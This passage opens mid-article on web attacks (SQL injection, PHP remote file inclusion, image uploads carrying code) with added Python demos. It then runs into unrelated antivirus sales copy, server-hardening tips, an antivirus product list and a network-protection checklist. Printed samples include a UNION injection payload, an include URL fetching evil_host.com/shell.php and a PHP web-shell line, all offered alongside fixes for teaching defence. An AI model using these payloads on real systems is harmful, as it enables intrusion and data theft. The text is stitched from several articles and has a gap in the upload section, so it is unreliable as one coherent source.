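To see the union payload from the text actually pull rows out of a table the script never meant to touch, and the type check plus bound parameter stop it, here is an added example that is not code from the original article. It uses Python's bundled sqlite3 in memory as a stand-in for MySQL so it runs offline; the `news` and `users` tables and their rows are constructed, and the payload uses `--` for the comment since sqlite has no `/*` trick or BENCHMARK().

```python
"""SQL injection: the vulnerable query from above beside its parameterized form.

Added example, not code from the original article. Python's bundled
sqlite3 (in memory) stands in for MySQL so the script runs offline; the
`news` table and its rows are constructed. UNION and the `--` comment
work the same way in both engines.
"""
import sqlite3

# The article's "-1 union select ..." idea, with the column count matched
# to the four columns the script selects from news.
PAYLOAD = "-1 union select name, password, 0, 0 from users--"


def make_db():
    """In-memory database with the article's `news` table and a `users`
    table that the script was never meant to expose."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table news (id integer primary key, title text, text text,
                           datenews text, author text);
        create table users (name text, password text);
        insert into news values (1, 'Hello', 'first post', '2007-06-19', 'admin');
        insert into users values ('admin', 's3cret-hash');
    """)
    return db


def get_news_vulnerable(db, news_id):
    """The bug from the article: the parameter is pasted into the SQL text."""
    sql = f"SELECT title, text, datenews, author FROM news WHERE id={news_id}"
    return db.execute(sql).fetchall()


def get_news_safe(db, news_id):
    """Fix 1: reject anything that is not an integer (the article's type check).
    Fix 2: hand the value to the driver as a bound parameter, so the
    database never parses it as SQL."""
    if not isinstance(news_id, int):
        try:
            news_id = int(news_id)
        except (TypeError, ValueError):
            raise ValueError("id must be an integer")
    sql = "SELECT title, text, datenews, author FROM news WHERE id=?"
    return db.execute(sql, (news_id,)).fetchall()


def safe_rejects(db, value):
    """True when get_news_safe() refuses the value instead of querying."""
    try:
        get_news_safe(db, value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(get_news_vulnerable(db, "1"))
    print(get_news_vulnerable(db, PAYLOAD))   # leaks the users table
    print(get_news_safe(db, "1"))
    print("payload rejected:", safe_rejects(db, PAYLOAD))
```

The vulnerable function returns the admin's password hash for the payload; the safe one raises before any SQL is sent. Binding parameters is the same idea as the mysqli prepare()/bind_param() pattern in PHP.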
  • File inclusion. Say there is a page site.com/getnews.php?file=190607, but the script's author includes the page with include without any checks.

    $file = $_REQUEST["file"];
    include($file.".html");

    The hacker substitutes evil_host.com/shell.php for 190607, so the hacker's address bar looks like site.com/getnews.php?file=http://evil_host.com/shell.php, and the hacker gets his own web shell on your site with Apache's rights. (The remote variant needs allow_url_include enabled in php.ini; with it off, a local file can still be included, for example one the attacker uploaded earlier, and in PHP before 5.3.4 a %00 null byte cut off the appended .html.)

    File connection protection:

    • Check and filter in your scripts all parameters the user enters or passes through the address bar; for a file parameter, accept only an allow-list of names (here, a number) and never a path or URL. Turn off allow_url_fopen and allow_url_include in php.ini. For your programming language, find material that teaches you how to code securely.
    • Hackers really like it when the language on the site lets them run system commands. Therefore, forbid calling such functions in your language if at all possible. For example, PHP lets you list "forbidden" functions with disable_functions in php.ini (system, exec, passthru, shell_exec, popen, proc_open).
  • Trojan picture
    If the site lets users upload files to the server, for example avatar pictures, be prepared. A JPEG image carries metadata (remember that the camera writes information about the shot into the frame), and into this metadata will be written


    The image is renamed avatara.jpg.php to bypass most extension checks, and the attacker then calls site.com/upload_images/avatara.jpg.php?cmd=server_commands.

    Trojan picture protection:

    • Check the file extension correctly: decide by the last extension and compare it against an allow-list; and even if you handle allowed files correctly, be prepared for the image to be renamed from .jpg to .php through another vulnerability on your site. Check for metadata in the image with functions like exif_read_data() in PHP, or better, re-encode the uploaded image (imagecreatefromjpeg() + imagejpeg() in GD), which discards the original metadata and any code hidden in it.
    • Prevent the execution of scripting languages in image directories by means of your web server. Look in the Apache config for lines like "AddType application/x-httpd-", which associate languages with file extensions, and forbid their execution in image directories. For Apache, forbidding access to PHP files in such a directory is the construct


      <FilesMatch "\.php$">
          # Apache 2.2 syntax; on Apache 2.4 use: Require all denied
          Order deny,allow
          Deny from all
      </FilesMatch>

    • For your programming language, find material that teaches secure coding for image processing and correctly uploading files to the server.
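The include() and upload items above are both about a file named by the user, and both have the same shape of fix: an allow-list for the name, then a check that the result is where you expect. The following is an added example, not code from the original article; it is written in Python as a stand-in for the PHP on the page. The news directory path is an assumption, the image bytes are constructed, and the magic-byte table covers only the formats an avatar upload would accept.

```python
"""Validating file parameters: the include() and avatar-upload cases above.

Added example, not code from the original article. It shows the two
checks a script should make before touching a file named by the user:
an allow-list for the include parameter (only a numeric id that resolves
under the news directory) and a real extension/content check for
uploads, so avatara.jpg.php never lands in a web-served directory with a
.php suffix. Filenames and directory paths are assumptions; the image
bytes are constructed.
"""
import os
import re

NEWS_DIR = "/var/www/news"           # assumed location of the .html pages
ALLOWED_IMAGE_EXT = {"jpg", "jpeg", "png", "gif"}

# Magic bytes a genuine upload must start with (JPEG SOI, PNG signature, GIF).
IMAGE_MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def resolve_news_file(param, base=NEWS_DIR):
    """Map ?file=190607 to base/190607.html, or return None.

    Only a plain digit string is accepted; that alone kills remote URLs,
    ../ traversal and null bytes. The path is then normalised and checked
    to still be inside `base` (belt and braces if the rule is ever relaxed).
    """
    if not re.fullmatch(r"[0-9]{1,12}", param or ""):
        return None
    path = os.path.normpath(os.path.join(base, param + ".html"))
    if os.path.dirname(path) != os.path.normpath(base):
        return None
    return path


def check_avatar(filename, data):
    """Return the safe extension for a stored avatar, or None to reject.

    The LAST extension decides (so a.jpg.php is .php and is rejected), the
    content must start with the magic bytes of that type, and the stored
    name must never be the user's name: write it as <random-id>.<ext> into
    a directory where the web server does not run scripts.
    """
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_IMAGE_EXT:
        return None
    if not any(data.startswith(m) for m in IMAGE_MAGIC[ext]):
        return None
    return ext


# Constructed upload samples.
REAL_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16          # JPEG header only
SHELL = b"<?php system($_GET['cmd']); ?>"

if __name__ == "__main__":
    print(resolve_news_file("190607"))
    print(resolve_news_file("evil_host.com/shell.php"))
    print(check_avatar("avatara.jpg", REAL_JPEG))
    print(check_avatar("avatara.jpg.php", SHELL))
    print(check_avatar("avatara.jpg", SHELL))
```

The magic-byte check does not catch a real JPEG with PHP hidden in its EXIF comment, which is the "Trojan picture" case: that file legitimately is a JPEG. The defence for it is the server-side one from the text (no script execution in the upload directory) plus re-encoding the image so the metadata is discarded.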

Personal thanks:

  • friend Alexander Pupyshev aka lynx for criticism and advice
  • site antichat.ru/
  • www.xakep.ru/
  • book by Michael Eben, Brian Taiman. FreeBSD Administration: The Art of Balancing
  • book by Joel Scambray, Stuart McClure, George Kurtz. Secrets of hackers: Network security - ready-made solutions. Second Edition

Other sources of protection information:

  • The FreeBSD security man page (man security) describes common security issues and good administration practices.
  • Subscribe to the freebsd-security@freebsd.org mailing list. To do this, send an email to majordomo@freebsd.org with "subscribe freebsd-security" in the body of the message. This list is where the most pressing current security problems are discussed.
  • FreeBSD security information page freebsd.org/security/
  • FreeBSD Security How-To Document
  • The CERT.org website contains information about security vulnerabilities in all operating systems.
  • Firewalls & Internet Security by William R. Cheswick and Steven M. Bellovin
  • Building Internet Firewalls, 2nd Edition by Brent Chapman and Elizabeth Zwicky

Outcome:
I hope the article helped you see all the problems together; now the admin needs to read about computer security, databases, web servers and programming languages from additional sources. Summarizing the article briefly: stay aware of news about newly published security problems, update, and check all input data for correctness in your own developments.
May the force be with you!

In order for the company's software services to work successfully without failures, you need high-quality installation, as well as setting up anti-virus protection. Today, no company can do without the use of the Internet for accounting, business correspondence, reporting. The CRM system is very popular, but the quality of its work directly depends on the connection to the global network.

Benefits of Installing Anti-Virus Software

Antivirus products provide different levels of protection. Programs help prevent problems such as:

  • theft of information through remote access to the server, including of a confidential nature (for example, data for accessing company accounts);
  • introduction of various client applications into the operating system to perform DDoS attacks;
  • failure of the company's equipment due to the harmful effects of various programs;
  • blocking, damage to programs and servers necessary for operation;
  • theft, falsification or destruction of confidential data.

To summarize, there is only one conclusion: deploying anti-virus protection will help the company avoid large financial losses. Moreover, this applies not only to preventing possible server hacking, but also to maintaining the functionality of equipment and paid online systems. That is why the issue of setting up high-quality and effective protection is always relevant for businesses of all sizes.

The most popular software for installation in the office

Most often, customers prefer setting up different versions of Kaspersky antivirus. The popularity of this software product is due to the following characteristics:

  • a large number of options for both small, medium and large businesses, a separate line for home use;
  • Kaspersky software packages are designed for installation not only on office servers, but also on mobile phones, laptops;
  • servers of joint work, mail, various files are reliably protected by an anti-virus product;
  • Kaspersky Anti-Virus counteracts attacks on Internet gateways;
  • product configuration eliminates the internal threat of a server attack, since it implies the differentiation of user rights.

Among other advantages of installing the specified anti-virus system are data backup, storing passwords and auto-completing Internet forms in a safe mode, preventing spam and phishing from entering servers. In addition, the price of protection by these products is very favorable. For users who are little versed in the intricacies of programming, the developers of Kaspersky Anti-Virus have created a convenient, simple and understandable interface.

What to look for when choosing security software?

  • which servers the specific software is designed to protect: home, small and medium-sized businesses, large companies;
  • breadth of coverage by the proposed programs of local business servers;
  • continuity of work, frequency and conditions of updating;
  • the possibility of centralized management of the anti-virus system;
  • compatibility of the proposed product with installed business programs and other software.

An important point is also the choice of a company that implements such products. A qualified employee in the shortest possible time will set up the correct work and instruct clients on how to use the program tools when working with servers. The cost of providing such services plays an important role - in our company it is always very profitable.

It is impossible to protect the server from external access once and for all, because every day new vulnerabilities are discovered and new ways of hacking the server appear. We will talk about protecting servers from unauthorized access in this article.

The servers of any company can sooner or later become a target for hacking or a virus attack. Typically, the result of such an attack is data loss, reputational or financial damage, so server security issues should be addressed in the first place.

It should be understood that protection against server hacking is a set of measures, including constant monitoring of server operation and continuous work to improve protection.


Ways and methods of protecting servers from unauthorized access

Physical protection of the server

Physical protection. It is desirable that the server be located in a secure data center, a closed and guarded room, outsiders should not have access to the server.

Set up SSH authentication

When setting up access to the server, use SSH key authentication instead of a password, since such keys are much more difficult, and sometimes simply impossible, to crack by brute-force search.

If you think that you still need a password, be sure to limit the number of attempts to enter it.

Pay attention if you see a message like this when you log in:

Last failed login: Tue Sep 28 12:42:35 MSK 2017 from 52.15.194.10 on ssh:notty
There were 8243 failed login attempts since the last successful login.

It may indicate that your server has been hacked. In this case, to harden the server, change the SSH port, restrict the list of IPs from which access to the server is possible, or install software that automatically blocks excessively frequent and suspicious login activity.

Install the latest updates regularly

To ensure server protection, install the latest patches and updates of the server software you use (operating system, hypervisor, database server) on time.

It is advisable to check for new patches, updates, and reported bugs/vulnerabilities every day to prevent attacks exploiting zero-day vulnerabilities. To do this, subscribe to news from the software vendor and follow its pages on social networks.

Protect passwords

By far one of the most common ways to gain access to a server is to crack the server's password. Therefore, follow the well-known, but nevertheless relevant recommendations in order not to leave the server unprotected:

  • do not use passwords that are easy to guess, such as the name of the company;
  • if you are still using the default password for the admin console, change it immediately;
  • passwords for different services must be different;
  • if you need to share your password with someone, never send your IP address, username and password in the same email or messenger message;
  • You can set up 2-Step Verification to log in to the administrator account.
Firewall
  • Make sure the server has a firewall, that it is configured, and that it is running all the time.
  • Protect both incoming and outgoing traffic.
  • Keep track of what ports are open and for what purpose, do not open anything unnecessary to reduce the number of possible vulnerabilities for server hacking.

In particular, the firewall is very helpful in protecting the server from DDoS attacks, because you can quickly create blocking firewall rules and add the IP addresses from which the attack is coming, or block access to certain applications over certain protocols.

Monitoring and intrusion detection
  • Limit the software and services running on your server. Periodically check everything that you have running, and if any unfamiliar processes are found, delete them immediately and start checking for viruses.
  • Periodically check for signs of tampering. A hack may be evidenced by new user accounts that you did not create, a moved or deleted /etc/syslog.conf, or deleted /etc/shadow and /etc/passwd files.
  • Monitor your server, keep an eye on its normal speed and throughput, so you can notice deviations, for example, when the load on the server has become much more than usual.
Using VPN and SSL/TLS Encryption

If remote access to the server is required, it must be allowed only from certain IP addresses and take place over a VPN.

The next step in ensuring security can be setting up SSL/TLS, which will not only encrypt data, but also verify the identity of the other participants in the network infrastructure by issuing them appropriate certificates.

Server security check

It would be a good idea to independently check the security of the server using the pentest method, i.e. simulating an attack to find potential vulnerabilities and eliminate them in time. It is advisable to involve information security specialists in this, although some tests can be done independently using penetration-testing tools.

What else threatens servers besides hacking

A server can go down for a number of reasons other than being hacked. For example, it could be a malware infection or just a physical failure of one of the components.

Therefore, measures to protect the server should include:

  • Installing and updating programs to protect the server - antiviruses.
  • Regular encrypted backups of data at least once a week, because, according to statistics, server hard drives rank first in frequency of failure. Make sure the backup is stored in a physically secure environment.
  • Ensuring uninterrupted power supply to the server room.
  • Timely physical maintenance of servers, including cleaning them of dust and replacing thermal paste.

The experience of Integrus specialists tells us that the best protection against such threats is the application of the best practices in the field of server protection systems.

To ensure the security of our customers' servers, we use a combination of tools: firewalls, antiviruses, security / event management technologies (SIM / SEM), intrusion detection / prevention technologies (IDS / IPS), network behavioral analysis (NBA) technologies, and of course regular preventive maintenance of servers and turnkey construction of secure server rooms. This allows you to minimize the risks of hacking or of server failure for other reasons.

We are ready to conduct a security audit of your company's servers, consult specialists, perform all types of work on setting up the protection of server equipment.

A server is a specialized computer, the actions on which occur without the active participation of the user. Usually there is a service software to carry out certain tasks. Through such a computer, data is exchanged, actions are launched, mathematical calculations are performed, and much more. All servers differ in types, for example, there are gaming, web, mail and proxy servers. Each such device performs a clearly defined task. Often, for the safe operation of such a machine, an antivirus is installed on it, so we would like to tell you more about such software, highlighting a few specific solutions.

Avast Business Antivirus Pro

Platform: Windows Server

The well-known antivirus company Avast releases a build specifically for servers, providing additional useful tools. For example, take the "Data Destruction" function. It overwrites all deleted data with randomly generated information, which prevents recreating the original state of a file when someone tries to restore it. In addition, there is "Behavior Analysis", a tool responsible for scanning working applications for suspicious activity. If Notepad tries to access the webcam, such a request will be blocked immediately. Of course, this example is simple, but the function works at a deeper level.

Avast Business Antivirus Pro also has a built-in firewall, smart scanning, spam protection, password protection, and easier account login. There is also a constant comparison of probable threats with the current virus database using the Software defender technology. It will allow you to interact only with verified data. In turn, the CyberCapture tool will send suspicious objects to the Threat Lab.

Avira Antivirus Server

Platform: Windows Server

Avira Antivirus Server is a special solution from the developer for servers running the Windows operating system. The creators promise maximally efficient work with low system resource consumption, a high threat detection rate and ease of use. The build adds on-access protection tools, that is, it monitors running processes when they are accessed by other applications. There is also manual scanning, which allows you to start the analysis of a specified medium or a separate directory at any time.

Once again, we note that the developer places particular emphasis on low consumption of PC resources and ease of antivirus management. Constant free innovations and virus database updates are also promised. If you are interested in getting acquainted with this product, you can get a free version for a 30-day period on the official website by filling out the appropriate form. During testing, all tools and functions will be available, as well as a free contact with the support service.

ESET File Security

ESET File Security is designed to run on Windows and Linux servers, and provides multi-layered protection thanks to the additional ESET Dynamic Threat Defense cloud sandbox component. The cloud-based protection system automatically protects against new threats without waiting for a detection engine update (the specified average update time is 20 minutes). Built-in network attack protection recognizes known vulnerabilities at the network level, and when using OneDrive, the Office 365 OneDrive Storage engine will scan it. Attention should also be paid to preventing the influence of botnets. The tool not only finds a malicious connection, but also detects the same processes, immediately blocking dangerous activity and notifying the user about it.

To manage ESET File Security, the user is prompted to install the console on Windows or Linux, and a ready-made virtual appliance can be imported to simplify setup. You can get acquainted with all the functionality of this antivirus, try its free version and buy the full one on the developers' official website.

Kaspersky Security

Platform: Windows Server, Linux

Kaspersky Security for Servers is included in the bundles Total, Endpoint Security for Business, Kaspersky Security for Virtual and Cloud Environments, and Kaspersky Security for Storage Systems. By purchasing one of these versions, you get reliable protection of your server from the newest generation of malware. The software in question has advanced server protection: it provides protection against exploits, protection of terminal servers, monitors external traffic and system integrity, and continuously protects data storage systems using a multi-level tool. Built-in administrator rights management provides ease of management and notifications, as well as integration with SIEM systems and Windows firewall management.

I would like to note that Kaspersky Security has separate system requirements for specific storage platforms, for example, for NetApp - Clustered Data ONTAP 8.x and 9.x and Data ONTAP 7.x and 8.x in 7-mode mode, and for EMC Isilon - IBM System Storage N series. You can get acquainted with the list of all requirements when downloading the antivirus on the Kaspersky website.

McAfee VirusScan Enterprise

Platform: Windows Server, Linux

Previously, users installed McAfee Endpoint Security on their servers, but the developers decided to improve this product and change its name. Now it is VirusScan Enterprise. Anyone who has previously used this antivirus is offered a free migration; the official website provides all the necessary instructions and lessons on this issue. The basic toolkit of the new version includes a firewall, web controls for threat communication, mandatory antivirus, and exploit prevention options.

McAfee VirusScan Enterprise also uses modern machine learning methods. Such technologies make it possible to detect malicious code through static and behavioral attributes. Malware is contained as soon as it enters the system, preventing it from infecting other processes. Endpoint Detection and Response technology is responsible for endpoint detection and response, which allows you to react to threats with one click.

Comodo Antivirus for Linux

Platform: Linux

The developers of Comodo Antivirus have presented a separate version for operating systems based on the Linux kernel. This program is supported by most distributions, both 32-bit and 64-bit. Of the features, I would like to immediately note the mail filter, which is compatible with popular mail agents: Postfix, Qmail, Sendmail and Exim MTA. The manufacturer guarantees reliable real-time protection, ease of installation and no complicated configuration steps. The anti-spam system can be completely edited manually, but the standard settings will provide good filtration. If the user wants to get even more control over files, a function is available to enable "Real-time Behavior Analysis". All suspicious objects will be sent to the cloud behavior analysis server.

For comfortable use of Comodo Antivirus, you will need a high-powered computer with a minimum processor frequency of 2 GHz and 2 GB of free RAM. You do not have to worry about running scans: it will be enough to configure their plan only once, and in the future they will be launched automatically. It is possible to start the analysis at any convenient time by pressing just one button. The antivirus in question is open source, distributed free of charge and downloaded from the official website.

Chkrootkit

Platform: Linux

Chkrootkit (Check Rootkit) is a program widely used by system administrators to protect the operating system from known rootkits. A rootkit is a collection of components, such as scripts, executables, or configuration files, that perform the function of masking, controlling, and collecting data. With the help of such tools, attackers penetrate the OS and get all the necessary information. The software mentioned above is just designed to protect the computer from this kind of activity. Chkrootkit does not require installation and can be run from a Live CD. Work in it is carried out through any convenient console, and management is clear even to an inexperienced user.

Chkrootkit works quite fast, does its job well and does not take up much space on the drive, but at the same time contains a large number of modules for every type of user. On the official website there are builds of the program in various formats, and downloading is available from the direct source or several mirrors.

You have been introduced to antivirus solutions that suit various types of servers. As you can see, each piece of software has its own characteristics, so each will be most useful in certain situations.

How to properly organize the defense of computer networks from malware.

The article is addressed to novice system administrators.

By antivirus protection, I mean protection against any kind of malware: viruses, trojans, root kits, backdoors,…

Step 1 of anti-virus protection: install anti-virus software on each computer in the network and update it at least daily. The correct scheme for updating anti-virus databases: 1-2 servers fetch the updates and distribute them to all computers in the network. Be sure to set a password for disabling protection.

Antivirus software has many disadvantages. The main drawback is that it does not catch viruses written to order that are not widely circulated. The second drawback is that it loads the processor and takes up memory on computers, some products more (Kaspersky), some less (Eset Nod32); this must be taken into account.

Installing anti-virus software is a mandatory but insufficient way to protect against virus outbreaks: often a virus signature appears in anti-virus databases only the day after the virus starts spreading, and in one day a virus can paralyze the operation of any computer network.

Usually, system administrators stop at step 1, worse, they don’t complete it or don’t follow the updates, and sooner or later the infection still occurs. Below I will list other important steps to strengthen anti-virus protection.

Step 2 Password policy. Viruses (trojans) can infect computers on the network by guessing passwords for standard accounts: root, admin, Administrator. Always use complex passwords! For accounts without passwords or with simple passwords, the system administrator should be fired with a corresponding entry in the work book. After 10 incorrect password attempts, the account should be locked for 5 minutes to protect against brute force (password guessing by simple enumeration). It is highly recommended that the built-in administrator accounts be renamed and disabled. Passwords need to be changed periodically.

Step 3 Restriction of user rights. A virus (trojan) spreads over the network on behalf of the user who launched it. If the user's rights are limited: there is no access to other computers, no administrative rights to his computer, then even a running virus will not be able to infect anything. It is not uncommon for system administrators themselves to become the culprits for the spread of a virus: they launched the admin key-gen and the virus went to infect all computers on the network ...

Step 4 Regular installation of security updates. It's hard work, but it has to be done. You need to update not only the OS, but also all applications: DBMS, mail servers.

Step 5 Restriction of the ways viruses penetrate. Viruses enter the local network of an enterprise in two ways: through removable media and through other networks (the Internet). By denying access to USB and CD/DVD, you completely block the first way. By restricting access to the Internet, you block the second. This method is very effective, but difficult to implement.

Step 6 Firewalls (ITU), also known as network screens or firewalls. They must be installed at the network boundaries. If your computer is directly connected to the Internet, then the ITU must be enabled. If the computer is connected only to a local area network (LAN) and accesses the Internet and other networks through servers, then it is not necessary to enable the ITU on this computer.

Step 7 Dividing an enterprise network into subnets. It is convenient to divide the network according to the principle: one department in one subnet, another department in another. Subnets can be separated at the physical layer (structured cabling, SCS), at the data link layer (VLAN), or at the network layer (subnets with non-overlapping IP address ranges).

Step 8 Windows has a wonderful tool for managing the security of large groups of computers - these are group policies (GPOs). Through GPO, you can configure computers and servers so that infection and distribution of malware becomes almost impossible.

Step 9 Terminal access. Raise 1-2 terminal servers on the network through which users will access the Internet and the probability of infection of their personal computers will drop to zero.

Step 10 Keeping track of all processes and services running on computers and servers. You can make it so that when an unknown process (service) starts, the system administrator is notified. Commercial software that can do this costs a lot, but in some cases the costs are justified.
